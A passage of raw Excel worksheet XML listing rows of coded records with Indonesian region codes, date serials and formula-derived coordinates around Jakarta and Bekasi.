        <v>3375</v>
      </c>
      <c r="H859" t="s">
        <v>26</v>
      </c>
      <c r="I859" t="s">
        <v>1046</v>
      </c>
      <c r="J859" t="s">
        <v>3376</v>
      </c>
      <c r="M859">
        <v>3172080001</v>
      </c>
      <c r="N859">
        <v>3172080</v>
      </c>
      <c r="O859">
        <v>3172</v>
      </c>
      <c r="P859">
        <v>31</v>
      </c>
      <c r="Q859" t="s">
        <v>48</v>
      </c>
      <c r="R859" t="s">
        <v>141</v>
      </c>
      <c r="S859" t="s">
        <v>49</v>
      </c>
      <c r="T859" t="s">
        <v>33</v>
      </c>
      <c r="U859" s="5">
        <v>10692276</v>
      </c>
      <c r="V859" s="5" t="s">
        <v>15250</v>
      </c>
      <c r="W859" s="5">
        <v>-620050</v>
      </c>
      <c r="X859" t="s">
        <v>19048</v>
      </c>
      <c r="Y859" t="str">
        <f t="shared" si="13"/>
        <v>-6.20050,106.92276</v>
      </c>
    </row>
    <row r="860" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A860">
        <v>108430</v>
      </c>
      <c r="B860" s="1">
        <v>43883</v>
      </c>
      <c r="C860">
        <v>1</v>
      </c>
      <c r="D860" t="s">
        <v>22</v>
      </c>
      <c r="E860" t="s">
        <v>23</v>
      </c>
      <c r="F860" t="s">
        <v>3377</v>
      </c>
      <c r="G860" t="s">
        <v>3378</v>
      </c>
      <c r="H860" t="s">
        <v>26</v>
      </c>
      <c r="I860" t="s">
        <v>76</v>
      </c>
      <c r="J860" t="s">
        <v>3379</v>
      </c>
      <c r="L860" t="s">
        <v>3380</v>
      </c>
      <c r="M860">
        <v>3173040001</v>
      </c>
      <c r="N860">
        <v>3173040</v>
      </c>
      <c r="O860">
        <v>3173</v>
      </c>
      <c r="P860">
        <v>31</v>
      </c>
      <c r="Q860" t="s">
        <v>1598</v>
      </c>
      <c r="R860" t="s">
        <v>1598</v>
      </c>
      <c r="S860" t="s">
        <v>62</v>
      </c>
      <c r="T860" t="s">
        <v>33</v>
      </c>
      <c r="U860" s="5">
        <v>10686134</v>
      </c>
      <c r="V860" s="5" t="s">
        <v>14902</v>
      </c>
      <c r="W860" s="5">
        <v>-618703</v>
      </c>
      <c r="X860" t="s">
        <v>19049</v>
      </c>
      <c r="Y860" t="str">
        <f t="shared" si="13"/>
        <v>-6.18703,106.86134</v>
      </c>
    </row>
    <row r="861" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A861">
        <v>108431</v>
      </c>
      <c r="B861" s="1">
        <v>43883</v>
      </c>
      <c r="C861">
        <v>1</v>
      </c>
      <c r="D861" t="s">
        <v>22</v>
      </c>
      <c r="E861" t="s">
        <v>23</v>
      </c>
      <c r="F861" t="s">
        <v>3381</v>
      </c>
      <c r="G861" t="s">
        <v>3382</v>
      </c>
      <c r="H861" t="s">
        <v>26</v>
      </c>
      <c r="I861" t="s">
        <v>1531</v>
      </c>
      <c r="J861" t="s">
        <v>3072</v>
      </c>
      <c r="L861" t="s">
        <v>3383</v>
      </c>
      <c r="M861">
        <v>3172080003</v>
      </c>
      <c r="N861">
        <v>3172080</v>
      </c>
      <c r="O861">
        <v>3172</v>
      </c>
      <c r="P861">
        <v>31</v>
      </c>
      <c r="Q861" t="s">
        <v>2250</v>
      </c>
      <c r="R861" t="s">
        <v>141</v>
      </c>
      <c r="S861" t="s">
        <v>49</v>
      </c>
      <c r="T861" t="s">
        <v>33</v>
      </c>
      <c r="U861" s="5">
        <v>10694880</v>
      </c>
      <c r="V861" s="5" t="s">
        <v>15251</v>
      </c>
      <c r="W861" s="5">
        <v>-619689</v>
      </c>
      <c r="X861" t="s">
        <v>19050</v>
      </c>
      <c r="Y861" t="str">
        <f t="shared" si="13"/>
        <v>-6.19689,106.94880</v>
      </c>
    </row>
    <row r="862" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A862">
        <v>108432</v>
      </c>
      <c r="B862" s="1">
        <v>43883</v>
      </c>
      <c r="C862">
        <v>1</v>
      </c>
      <c r="D862" t="s">
        <v>22</v>
      </c>
      <c r="E862" t="s">
        <v>23</v>
      </c>
      <c r="F862" t="s">
        <v>3384</v>
      </c>
      <c r="G862" t="s">
        <v>3385</v>
      </c>
      <c r="H862" t="s">
        <v>26</v>
      </c>
      <c r="I862" t="s">
        <v>1389</v>
      </c>
      <c r="J862" t="s">
        <v>2627</v>
      </c>
      <c r="L862" t="s">
        <v>3386</v>
      </c>
      <c r="M862">
        <v>3275061004</v>
      </c>
      <c r="N862">
        <v>3275061</v>
      </c>
      <c r="O862">
        <v>3275</v>
      </c>
      <c r="P862">
        <v>32</v>
      </c>
      <c r="Q862" t="s">
        <v>39</v>
      </c>
      <c r="R862" t="s">
        <v>40</v>
      </c>
      <c r="S862" t="s">
        <v>41</v>
      </c>
      <c r="T862" t="s">
        <v>42</v>
      </c>
      <c r="U862" s="5">
        <v>10698787</v>
      </c>
      <c r="V862" s="5" t="s">
        <v>15252</v>
      </c>
      <c r="W862" s="5">
        <v>-618051</v>
      </c>
      <c r="X862" t="s">
        <v>19051</v>
      </c>
      <c r="Y862" t="str">
        <f t="shared" si="13"/>
        <v>-6.18051,106.98787</v>
      </c>
    </row>
    <row r="863" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A863">
        <v>108433</v>
      </c>
      <c r="B863" s="1">
        <v>43883</v>
      </c>
      <c r="C863">
        <v>1</v>
      </c>
      <c r="D863" t="s">
        <v>22</v>
      </c>
      <c r="E863" t="s">
        <v>23</v>
      </c>
      <c r="F863" s="3" t="s">
        <v>3387</v>
      </c>
      <c r="G863" t="s">
        <v>3388</v>
      </c>
      <c r="H863" t="s">
        <v>26</v>
      </c>
      <c r="I863" t="s">
        <v>882</v>
      </c>
      <c r="J863" t="s">
        <v>2837</v>
      </c>
      <c r="L863" t="s">
        <v>3389</v>
      </c>
      <c r="M863">
        <v>3172060004</v>
      </c>
      <c r="N863">
        <v>3172060</v>
      </c>
      <c r="O863">
        <v>3172</v>
      </c>
      <c r="P863">
        <v>31</v>
      </c>
      <c r="Q863" t="s">
        <v>47</v>
      </c>
      <c r="R863" t="s">
        <v>48</v>
      </c>
      <c r="S863" t="s">
        <v>49</v>
      </c>
      <c r="T863" t="s">
        <v>33</v>
      </c>
      <c r="U863" s="5">
        <v>10688949</v>
      </c>
      <c r="V863" s="5" t="s">
        <v>15253</v>
      </c>
      <c r="W863" s="5">
        <v>-621831</v>
      </c>
      <c r="X863" t="s">
        <v>19009</v>
      </c>
      <c r="Y863" t="str">
        <f t="shared" si="13"/>
        <v>-6.21831,106.88949</v>
      </c>
    </row>
    <row r="864" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A864">
        <v>108434</v>
      </c>
      <c r="B864" s="1">
        <v>43883</v>
      </c>
      <c r="C864">
        <v>1</v>
      </c>
      <c r="D864" t="s">
        <v>22</v>
      </c>
      <c r="E864" t="s">
        <v>23</v>
      </c>
      <c r="F864" t="s">
        <v>3390</v>
      </c>
      <c r="H864" t="s">
        <v>26</v>
      </c>
      <c r="I864" t="s">
        <v>1891</v>
      </c>
      <c r="J864" t="s">
        <v>2871</v>
      </c>
      <c r="L864" t="s">
        <v>3391</v>
      </c>
      <c r="M864">
        <v>3172080003</v>
      </c>
      <c r="N864">
        <v>3172080</v>
      </c>
      <c r="O864">
        <v>3172</v>
      </c>
      <c r="P864">
        <v>31</v>
      </c>
      <c r="Q864" t="s">
        <v>2250</v>
      </c>
      <c r="R864" t="s">
        <v>141</v>
      </c>
      <c r="S864" t="s">
        <v>49</v>
      </c>
      <c r="T864" t="s">
        <v>33</v>
      </c>
      <c r="U864" s="5">
        <v>10695137</v>
      </c>
      <c r="V864" s="5" t="s">
        <v>15254</v>
      </c>
      <c r="W864" s="5">
        <v>-620049</v>
      </c>
      <c r="X864" t="s">
        <v>19052</v>
      </c>
      <c r="Y864" t="str">
        <f t="shared" si="13"/>
        <v>-6.20049,106.95137</v>
      </c>
    </row>
    <row r="865" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A865">
        <v>108435</v>
      </c>
      <c r="B865" s="1">
        <v>43883</v>
      </c>
      <c r="C865">
        <v>1</v>
      </c>
      <c r="D865" t="s">
        <v>22</v>
      </c>
      <c r="E865" t="s">
        <v>23</v>
      </c>
      <c r="F865" t="s">
        <v>3392</v>
      </c>
      <c r="G865" t="s">
        <v>3393</v>
      </c>
      <c r="H865" t="s">
        <v>26</v>
      </c>
      <c r="I865" t="s">
        <v>197</v>
      </c>
      <c r="J865" t="s">
        <v>2627</v>
      </c>
      <c r="L865" t="s">
        <v>3394</v>
      </c>
      <c r="M865">
        <v>3275010011</v>
      </c>
      <c r="N865">
        <v>3275010</v>
      </c>
      <c r="O865">
        <v>3275</v>
      </c>
      <c r="P865">
        <v>32</v>
      </c>
      <c r="Q865" t="s">
        <v>2389</v>
      </c>
      <c r="R865" t="s">
        <v>287</v>
      </c>
      <c r="S865" t="s">
        <v>41</v>
      </c>
      <c r="T865" t="s">
        <v>42</v>
      </c>
      <c r="U865" s="5">
        <v>10691612</v>
      </c>
      <c r="V865" s="5" t="s">
        <v>15255</v>
      </c>
      <c r="W865" s="5">
        <v>-626618</v>
      </c>
      <c r="X865" t="s">
        <v>19053</v>
      </c>
      <c r="Y865" t="str">
        <f t="shared" si="13"/>
        <v>-6.26618,106.91612</v>
      </c>
    </row>
    <row r="866" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A866">
        <v>108436</v>
      </c>
      <c r="B866" s="1">
        <v>43883</v>
      </c>
      <c r="C866">
        <v>1</v>
      </c>
      <c r="D866" t="s">
        <v>22</v>
      </c>
      <c r="E866" t="s">
        <v>23</v>
      </c>
      <c r="F866" t="s">
        <v>3395</v>
      </c>
      <c r="G866" t="s">
        <v>3396</v>
      </c>
      <c r="H866" t="s">
        <v>26</v>
      </c>
      <c r="I866" t="s">
        <v>166</v>
      </c>
      <c r="J866" t="s">
        <v>2627</v>
      </c>
      <c r="L866" t="s">
        <v>3397</v>
      </c>
      <c r="M866">
        <v>3275070002</v>
      </c>
      <c r="N866">
        <v>3275070</v>
      </c>
      <c r="O866">
        <v>3275</v>
      </c>
      <c r="P866">
        <v>32</v>
      </c>
      <c r="Q866" t="s">
        <v>3309</v>
      </c>
      <c r="R866" t="s">
        <v>3310</v>
      </c>
      <c r="S866" t="s">
        <v>41</v>
      </c>
      <c r="T866" t="s">
        <v>42</v>
      </c>
      <c r="U866" s="5">
        <v>10700331</v>
      </c>
      <c r="V866" s="5" t="s">
        <v>15256</v>
      </c>
      <c r="W866" s="5">
        <v>-617536</v>
      </c>
      <c r="X866" t="s">
        <v>19054</v>
      </c>
      <c r="Y866" t="str">
        <f t="shared" si="13"/>
        <v>-6.17536,107.00331</v>
      </c>
    </row>
    <row r="867" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A867">
        <v>108437</v>
      </c>
      <c r="B867" s="1">
        <v>43883</v>
      </c>
      <c r="C867">
        <v>1</v>
      </c>
      <c r="D867" t="s">
        <v>22</v>
      </c>
      <c r="E867" t="s">
        <v>23</v>
      </c>
      <c r="F867" t="s">
        <v>3398</v>
      </c>
      <c r="H867" t="s">
        <v>26</v>
      </c>
      <c r="I867" t="s">
        <v>27</v>
      </c>
      <c r="J867" t="s">
        <v>3399</v>
      </c>
      <c r="L867" t="s">
        <v>3400</v>
      </c>
      <c r="M867">
        <v>3175050002</v>
      </c>
      <c r="N867">
        <v>3175050</v>
      </c>
      <c r="O867">
        <v>3175</v>
      </c>
      <c r="P867">
        <v>31</v>
      </c>
      <c r="Q867" t="s">
        <v>1012</v>
      </c>
      <c r="R867" t="s">
        <v>1013</v>
      </c>
      <c r="S867" t="s">
        <v>547</v>
      </c>
      <c r="T867" t="s">
        <v>33</v>
      </c>
      <c r="U867" s="5">
        <v>10690199</v>
      </c>
      <c r="V867" s="5" t="s">
        <v>15257</v>
      </c>
      <c r="W867" s="5">
        <v>-616138</v>
      </c>
      <c r="X867" t="s">
        <v>19055</v>
      </c>
      <c r="Y867" t="str">
        <f t="shared" si="13"/>
        <v>-6.16138,106.90199</v>
      </c>
    </row>
    <row r="868" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A868">
        <v>108438</v>
      </c>
      <c r="B868" s="1">
        <v>43883</v>
      </c>
      <c r="C868">
        <v>1</v>
      </c>
      <c r="D868" t="s">
        <v>22</v>
      </c>
      <c r="E868" t="s">
        <v>23</v>
      </c>
      <c r="F868" t="s">
        <v>3401</v>
      </c>
      <c r="G868" t="s">
        <v>3402</v>
      </c>
      <c r="H868" t="s">
        <v>26</v>
      </c>
      <c r="I868" t="s">
        <v>137</v>
      </c>
      <c r="J868" t="s">
        <v>3403</v>
      </c>
      <c r="L868" t="s">
        <v>3404</v>
      </c>
      <c r="M868">
        <v>3171100005</v>
      </c>
      <c r="N868">
        <v>3171100</v>
      </c>
      <c r="O868">
        <v>3171</v>
      </c>
      <c r="P868">
        <v>31</v>
      </c>
      <c r="Q868" t="s">
        <v>1630</v>
      </c>
      <c r="R868" t="s">
        <v>107</v>
      </c>
      <c r="S868" t="s">
        <v>108</v>
      </c>
      <c r="T868" t="s">
        <v>33</v>
      </c>
      <c r="U868" s="5">
        <v>10684266</v>
      </c>
      <c r="V868" s="5" t="s">
        <v>15258</v>
      </c>
      <c r="W868" s="5">
        <v>-621807</v>
      </c>
      <c r="X868" t="s">
        <v>19056</v>
      </c>
      <c r="Y868" t="str">
        <f t="shared" si="13"/>
        <v>-6.21807,106.84266</v>
      </c>
    </row>
    <row r="869" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A869">
        <v>108439</v>
      </c>
      <c r="B869" s="1">
        <v>43883</v>
      </c>
      <c r="C869">
        <v>1</v>
      </c>
      <c r="D869" t="s">
        <v>22</v>
      </c>
      <c r="E869" t="s">
        <v>23</v>
      </c>
      <c r="F869" t="s">
        <v>3405</v>
      </c>
      <c r="G869" t="s">
        <v>3406</v>
      </c>
      <c r="H869" t="s">
        <v>26</v>
      </c>
      <c r="I869" t="s">
        <v>3407</v>
      </c>
      <c r="J869" t="s">
        <v>1771</v>
      </c>
      <c r="L869" t="s">
        <v>3408</v>
      </c>
      <c r="M869">
        <v>3172100005</v>
      </c>
      <c r="N869">
        <v>3172100</v>
      </c>
      <c r="O869">
        <v>3172</v>
      </c>
      <c r="P869">
        <v>31</v>
      </c>
      <c r="Q869" t="s">
        <v>1773</v>
      </c>
      <c r="R869" t="s">
        <v>1436</v>
      </c>
      <c r="S869" t="s">
        <v>49</v>
      </c>
      <c r="T869" t="s">
        <v>33</v>
      </c>
      <c r="U869" s="5">
        <v>10687140</v>
      </c>
      <c r="V869" s="5" t="s">
        <v>15259</v>
      </c>
      <c r="W869" s="5">
        <v>-620721</v>
      </c>
      <c r="X869" t="s">
        <v>19057</v>
      </c>
      <c r="Y869" t="str">
        <f t="shared" si="13"/>
        <v>-6.20721,106.87140</v>
      </c>
    </row>
    <row r="870" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A870">
        <v>108440</v>
      </c>
      <c r="B870" s="1">
        <v>43883</v>
      </c>
      <c r="C870">
        <v>1</v>
      </c>
      <c r="D870" t="s">
        <v>22</v>
      </c>
      <c r="E870" t="s">
        <v>23</v>
      </c>
      <c r="F870" t="s">
        <v>3409</v>
      </c>
      <c r="H870" t="s">
        <v>26</v>
      </c>
      <c r="I870" t="s">
        <v>386</v>
      </c>
      <c r="J870" t="s">
        <v>3410</v>
      </c>
      <c r="L870" t="s">
        <v>3411</v>
      </c>
      <c r="M870">
        <v>3172080005</v>
      </c>
      <c r="N870">
        <v>3172080</v>
      </c>
      <c r="O870">
        <v>3172</v>
      </c>
      <c r="P870">
        <v>31</v>
      </c>
      <c r="Q870" t="s">
        <v>140</v>
      </c>
      <c r="R870" t="s">
        <v>141</v>
      </c>
      <c r="S870" t="s">
        <v>49</v>
      </c>
      <c r="T870" t="s">
        <v>33</v>
      </c>
      <c r="U870" s="5">
        <v>10696040</v>
      </c>
      <c r="V870" s="5" t="s">
        <v>15260</v>
      </c>
      <c r="W870" s="5">
        <v>-615813</v>
      </c>
      <c r="X870" t="s">
        <v>19058</v>
      </c>
      <c r="Y870" t="str">
        <f t="shared" si="13"/>
        <v>-6.15813,106.96040</v>
      </c>
    </row>
    <row r="871" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A871">
        <v>108441</v>
      </c>
      <c r="B871" s="1">
        <v>43883</v>
      </c>
      <c r="C871">
        <v>1</v>
      </c>
      <c r="D871" t="s">
        <v>22</v>
      </c>
      <c r="E871" t="s">
        <v>23</v>
      </c>
      <c r="F871" t="s">
        <v>3412</v>
      </c>
      <c r="G871" t="s">
        <v>3413</v>
      </c>
      <c r="H871" t="s">
        <v>26</v>
      </c>
      <c r="I871" t="s">
        <v>1046</v>
      </c>
      <c r="J871" t="s">
        <v>2788</v>
      </c>
      <c r="L871" t="s">
        <v>3414</v>
      </c>
      <c r="M871">
        <v>3173050001</v>
      </c>
      <c r="N871">
        <v>3173050</v>
      </c>
      <c r="O871">
        <v>3173</v>
      </c>
      <c r="P871">
        <v>31</v>
      </c>
      <c r="Q871" t="s">
        <v>2790</v>
      </c>
      <c r="R871" t="s">
        <v>589</v>
      </c>
      <c r="S871" t="s">
        <v>62</v>
      </c>
      <c r="T871" t="s">
        <v>33</v>
      </c>
      <c r="U871" s="5">
        <v>10687067</v>
      </c>
      <c r="V871" s="5" t="s">
        <v>15261</v>
      </c>
      <c r="W871" s="5">
        <v>-618883</v>
      </c>
      <c r="X871" t="s">
        <v>19059</v>
      </c>
      <c r="Y871" t="str">
        <f t="shared" si="13"/>
        <v>-6.18883,106.87067</v>
      </c>
    </row>
    <row r="872" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A872">
        <v>108442</v>
      </c>
      <c r="B872" s="1">
        <v>43883</v>
      </c>
      <c r="C872">
        <v>1</v>
      </c>
      <c r="D872" t="s">
        <v>22</v>
      </c>
      <c r="E872" t="s">
        <v>23</v>
      </c>
      <c r="F872" t="s">
        <v>3415</v>
      </c>
      <c r="G872" t="s">
        <v>3416</v>
      </c>
      <c r="H872" t="s">
        <v>26</v>
      </c>
      <c r="I872" t="s">
        <v>974</v>
      </c>
      <c r="J872" t="s">
        <v>3417</v>
      </c>
      <c r="L872" t="s">
        <v>3418</v>
      </c>
      <c r="M872">
        <v>3172070001</v>
      </c>
      <c r="N872">
        <v>3172070</v>
      </c>
      <c r="O872">
        <v>3172</v>
      </c>
      <c r="P872">
        <v>31</v>
      </c>
      <c r="Q872" t="s">
        <v>127</v>
      </c>
      <c r="R872" t="s">
        <v>128</v>
      </c>
      <c r="S872" t="s">
        <v>49</v>
      </c>
      <c r="T872" t="s">
        <v>33</v>
      </c>
      <c r="U872" s="5">
        <v>10690873</v>
      </c>
      <c r="V872" s="5" t="s">
        <v>15262</v>
      </c>
      <c r="W872" s="5">
        <v>-623495</v>
      </c>
      <c r="X872" t="s">
        <v>19060</v>
      </c>
      <c r="Y872" t="str">
        <f t="shared" si="13"/>
        <v>-6.23495,106.90873</v>
      </c>
    </row>
    <row r="873" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A873">
        <v>108443</v>
      </c>
      <c r="B873" s="1">
        <v>43883</v>
      </c>
      <c r="C873">
        <v>1</v>
      </c>
      <c r="D873" t="s">
        <v>22</v>
      </c>
      <c r="E873" t="s">
        <v>23</v>
      </c>
      <c r="F873" t="s">
        <v>3419</v>
      </c>
      <c r="G873" t="s">
        <v>3420</v>
      </c>
      <c r="H873" t="s">
        <v>26</v>
      </c>
      <c r="I873" t="s">
        <v>3062</v>
      </c>
      <c r="J873" t="s">
        <v>2627</v>
      </c>
      <c r="L873" t="s">
        <v>3421</v>
      </c>
      <c r="M873">
        <v>3275061004</v>
      </c>
      <c r="N873">
        <v>3275061</v>
      </c>
      <c r="O873">
        <v>3275</v>
      </c>
      <c r="P873">
        <v>32</v>
      </c>
      <c r="Q873" t="s">
        <v>39</v>
      </c>
      <c r="R873" t="s">
        <v>40</v>
      </c>
      <c r="S873" t="s">
        <v>41</v>
      </c>
      <c r="T873" t="s">
        <v>42</v>
      </c>
      <c r="U873" s="5">
        <v>10697922</v>
      </c>
      <c r="V873" s="5" t="s">
        <v>15263</v>
      </c>
      <c r="W873" s="5">
        <v>-618017</v>
      </c>
      <c r="X873" t="s">
        <v>19061</v>
      </c>
      <c r="Y873" t="str">
        <f t="shared" si="13"/>
        <v>-6.18017,106.97922</v>
      </c>
    </row>
    <row r="874" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A874">
        <v>108444</v>
      </c>
      <c r="B874" s="1">
        <v>43883</v>
      </c>
      <c r="C874">
        <v>1</v>
      </c>
      <c r="D874" t="s">
        <v>22</v>
      </c>
      <c r="E874" t="s">
        <v>23</v>
      </c>
      <c r="F874" t="s">
        <v>3422</v>
      </c>
      <c r="G874" t="s">
        <v>3423</v>
      </c>
      <c r="H874" t="s">
        <v>26</v>
      </c>
      <c r="I874" t="s">
        <v>166</v>
      </c>
      <c r="J874" t="s">
        <v>3424</v>
      </c>
      <c r="L874" t="s">
        <v>3425</v>
      </c>
      <c r="M874">
        <v>3172080006</v>
      </c>
      <c r="N874">
        <v>3172080</v>
      </c>
      <c r="O874">
        <v>3172</v>
      </c>
      <c r="P874">
        <v>31</v>
      </c>
      <c r="Q874" t="s">
        <v>2853</v>
      </c>
      <c r="R874" t="s">
        <v>141</v>
      </c>
      <c r="S874" t="s">
        <v>49</v>
      </c>
      <c r="T874" t="s">
        <v>33</v>
      </c>
      <c r="U874" s="5">
        <v>10693596</v>
      </c>
      <c r="V874" s="5" t="s">
        <v>15264</v>
      </c>
      <c r="W874" s="5">
        <v>-618043</v>
      </c>
      <c r="X874" t="s">
        <v>19062</v>
      </c>
      <c r="Y874" t="str">
        <f t="shared" si="13"/>
        <v>-6.18043,106.93596</v>
      </c>
    </row>
    <row r="875" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A875">
        <v>108445</v>
      </c>
      <c r="B875" s="1">
        <v>43883</v>
      </c>
      <c r="C875">
        <v>1</v>
      </c>
      <c r="D875" t="s">
        <v>22</v>
      </c>
      <c r="E875" t="s">
        <v>23</v>
      </c>
      <c r="F875" t="s">
        <v>3426</v>
      </c>
      <c r="G875" t="s">
        <v>3427</v>
      </c>
      <c r="H875" t="s">
        <v>26</v>
      </c>
      <c r="I875" t="s">
        <v>2962</v>
      </c>
      <c r="J875" t="s">
        <v>2384</v>
      </c>
      <c r="M875">
        <v>3172090006</v>
      </c>
      <c r="N875">
        <v>3172090</v>
      </c>
      <c r="O875">
        <v>3172</v>
      </c>
      <c r="P875">
        <v>31</v>
      </c>
      <c r="Q875" t="s">
        <v>2283</v>
      </c>
      <c r="R875" t="s">
        <v>890</v>
      </c>
      <c r="S875" t="s">
        <v>49</v>
      </c>
      <c r="T875" t="s">
        <v>33</v>
      </c>
      <c r="U875" s="5">
        <v>10688412</v>
      </c>
      <c r="V875" s="5" t="s">
        <v>15265</v>
      </c>
      <c r="W875" s="5">
        <v>-617980</v>
      </c>
      <c r="X875" t="s">
        <v>19063</v>
      </c>
      <c r="Y875" t="str">
        <f t="shared" si="13"/>
        <v>-6.17980,106.88412</v>
      </c>
    </row>
    <row r="876" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A876">
        <v>108446</v>
      </c>
      <c r="B876" s="1">
        <v>43883</v>
      </c>
      <c r="C876">
        <v>1</v>
      </c>
      <c r="D876" t="s">
        <v>22</v>
      </c>
      <c r="E876" t="s">
        <v>23</v>
      </c>
      <c r="F876" t="s">
        <v>3428</v>
      </c>
      <c r="G876" t="s">
        <v>3429</v>
      </c>
      <c r="H876" t="s">
        <v>26</v>
      </c>
      <c r="I876" t="s">
        <v>592</v>
      </c>
      <c r="J876" t="s">
        <v>1711</v>
      </c>
      <c r="L876" t="s">
        <v>3430</v>
      </c>
      <c r="M876">
        <v>3175050001</v>
      </c>
      <c r="N876">
        <v>3175050</v>
      </c>
      <c r="O876">
        <v>3175</v>
      </c>
      <c r="P876">
        <v>31</v>
      </c>
      <c r="Q876" t="s">
        <v>1037</v>
      </c>
      <c r="R876" t="s">
        <v>1013</v>
      </c>
      <c r="S876" t="s">
        <v>547</v>
      </c>
      <c r="T876" t="s">
        <v>33</v>
      </c>
      <c r="U876" s="5">
        <v>10690659</v>
      </c>
      <c r="V876" s="5" t="s">
        <v>15266</v>
      </c>
      <c r="W876" s="5">
        <v>-614576</v>
      </c>
      <c r="X876" t="s">
        <v>18893</v>
      </c>
      <c r="Y876" t="str">
        <f t="shared" si="13"/>
        <v>-6.14576,106.90659</v>
      </c>
    </row>
    <row r="877" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A877">
        <v>108447</v>
      </c>
      <c r="B877" s="1">
        <v>43883</v>
      </c>
      <c r="C877">
        <v>1</v>
      </c>
      <c r="D877" t="s">
        <v>22</v>
      </c>
      <c r="E877" t="s">
        <v>23</v>
      </c>
      <c r="F877" t="s">
        <v>3431</v>
      </c>
      <c r="G877" t="s">
        <v>3432</v>
      </c>
      <c r="H877" t="s">
        <v>26</v>
      </c>
      <c r="I877" t="s">
        <v>1531</v>
      </c>
      <c r="J877" t="s">
        <v>2871</v>
      </c>
      <c r="L877" t="s">
        <v>3433</v>
      </c>
      <c r="M877">
        <v>3172080003</v>
      </c>
      <c r="N877">
        <v>3172080</v>
      </c>
      <c r="O877">
        <v>3172</v>
      </c>
      <c r="P877">
        <v>31</v>
      </c>
      <c r="Q877" t="s">
        <v>2250</v>
      </c>
      <c r="R877" t="s">
        <v>141</v>
      </c>
      <c r="S877" t="s">
        <v>49</v>
      </c>
      <c r="T877" t="s">
        <v>33</v>
      </c>
      <c r="U877" s="5">
        <v>10695378</v>
      </c>
      <c r="V877" s="5" t="s">
        <v>15267</v>
      </c>
      <c r="W877" s="5">
        <v>-619589</v>
      </c>
      <c r="X877" t="s">
        <v>19064</v>
      </c>
      <c r="Y877" t="str">
        <f t="shared" si="13"/>
        <v>-6.19589,106.95378</v>
      </c>
    </row>
    <row r="878" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A878">
        <v>108448</v>
      </c>
      <c r="B878" s="1">
        <v>43883</v>
      </c>
      <c r="C878">
        <v>1</v>
      </c>
      <c r="D878" t="s">
        <v>22</v>
      </c>
      <c r="E878" t="s">
        <v>23</v>
      </c>
      <c r="F878" t="s">
        <v>3434</v>
      </c>
      <c r="H878" t="s">
        <v>26</v>
      </c>
      <c r="I878" t="s">
        <v>457</v>
      </c>
      <c r="J878" t="s">
        <v>2627</v>
      </c>
      <c r="L878" t="s">
        <v>3435</v>
      </c>
      <c r="M878">
        <v>3275061004</v>
      </c>
      <c r="N878">
        <v>3275061</v>
      </c>
      <c r="O878">
        <v>3275</v>
      </c>
      <c r="P878">
        <v>32</v>
      </c>
      <c r="Q878" t="s">
        <v>39</v>
      </c>
      <c r="R878" t="s">
        <v>40</v>
      </c>
      <c r="S878" t="s">
        <v>41</v>
      </c>
      <c r="T878" t="s">
        <v>42</v>
      </c>
      <c r="U878" s="5">
        <v>10698677</v>
      </c>
      <c r="V878" s="5" t="s">
        <v>15268</v>
      </c>
      <c r="W878" s="5">
        <v>-617380</v>
      </c>
      <c r="X878" t="s">
        <v>18823</v>
      </c>
      <c r="Y878" t="str">
        <f t="shared" si="13"/>
        <v>-6.17380,106.98677</v>
      </c>
    </row>
    <row r="879" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A879">
        <v>108449</v>
      </c>
      <c r="B879" s="1">
        <v>43883</v>
      </c>
      <c r="C879">
        <v>1</v>
      </c>
      <c r="D879" t="s">
        <v>22</v>
      </c>
      <c r="E879" t="s">
        <v>23</v>
      </c>
      <c r="F879" t="s">
        <v>3436</v>
      </c>
      <c r="G879" t="s">
        <v>3437</v>
      </c>
      <c r="H879" t="s">
        <v>26</v>
      </c>
      <c r="I879" t="s">
        <v>27</v>
      </c>
      <c r="J879" t="s">
        <v>3438</v>
      </c>
      <c r="L879" t="s">
        <v>3439</v>
      </c>
      <c r="M879">
        <v>3172090007</v>
      </c>
      <c r="N879">
        <v>3172090</v>
      </c>
      <c r="O879">
        <v>3172</v>
      </c>
      <c r="P879">
        <v>31</v>
      </c>
      <c r="Q879" t="s">
        <v>890</v>
      </c>
      <c r="R879" t="s">
        <v>890</v>
      </c>
      <c r="S879" t="s">
        <v>49</v>
      </c>
      <c r="T879" t="s">
        <v>33</v>
      </c>
      <c r="U879" s="5">
        <v>10690226</v>
      </c>
      <c r="V879" s="5" t="s">
        <v>15269</v>
      </c>
      <c r="W879" s="5">
        <v>-618358</v>
      </c>
      <c r="X879" t="s">
        <v>19065</v>
      </c>
      <c r="Y879" t="str">
        <f t="shared" si="13"/>
        <v>-6.18358,106.90226</v>
      </c>
    </row>
    <row r="880" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A880">
        <v>108450</v>
      </c>
      <c r="B880" s="1">
        <v>43883</v>
      </c>
      <c r="C880">
        <v>1</v>
      </c>
      <c r="D880" t="s">
        <v>22</v>
      </c>
      <c r="E880" t="s">
        <v>23</v>
      </c>
      <c r="F880" s="3" t="s">
        <v>3440</v>
      </c>
      <c r="G880" t="s">
        <v>3441</v>
      </c>
      <c r="H880" t="s">
        <v>26</v>
      </c>
      <c r="I880" t="s">
        <v>2165</v>
      </c>
      <c r="J880" t="s">
        <v>3438</v>
      </c>
      <c r="L880" t="s">
        <v>3442</v>
      </c>
      <c r="M880">
        <v>3172090007</v>
      </c>
      <c r="N880">
        <v>3172090</v>
      </c>
      <c r="O880">
        <v>3172</v>
      </c>
      <c r="P880">
        <v>31</v>
      </c>
      <c r="Q880" t="s">
        <v>890</v>
      </c>
      <c r="R880" t="s">
        <v>890</v>
      </c>
